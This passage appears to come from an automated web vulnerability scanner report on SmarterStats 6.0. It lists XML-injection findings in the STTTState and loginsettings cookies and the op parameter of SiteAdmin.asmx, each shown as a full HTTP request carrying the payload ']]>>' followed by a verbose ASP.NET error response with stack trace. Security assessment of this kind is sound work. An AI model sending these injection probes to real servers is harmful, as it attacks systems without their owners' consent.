&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteInfo&gt;
&lt;SiteInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteInfo&gt;
&lt;/Sites&gt;
&lt;/SiteInfoArrayResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/GetAllSites HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>IncludeDetails</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteInfoArrayResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteInfo&gt;
&lt;SiteInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteInfo&gt;
&lt;/Sites&gt;
&lt;/SiteInfoArrayResult&gt;</pre>
</span>

</span>









</body>
</html>

3.17. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STTTState cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The STTTState cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the STTTState cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Services/SiteAdmin.asmx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/
Cookie: SelectedLanguage=; STTTState=]]>>; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:00:59 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

3.18. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [loginsettings cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The loginsettings cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the loginsettings cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Services/SiteAdmin.asmx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=]]>>;

Response

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:23 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

3.19. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [op parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The op parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the op parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Services/SiteAdmin.asmx?op=MoveSite]]>> HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:02:06 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
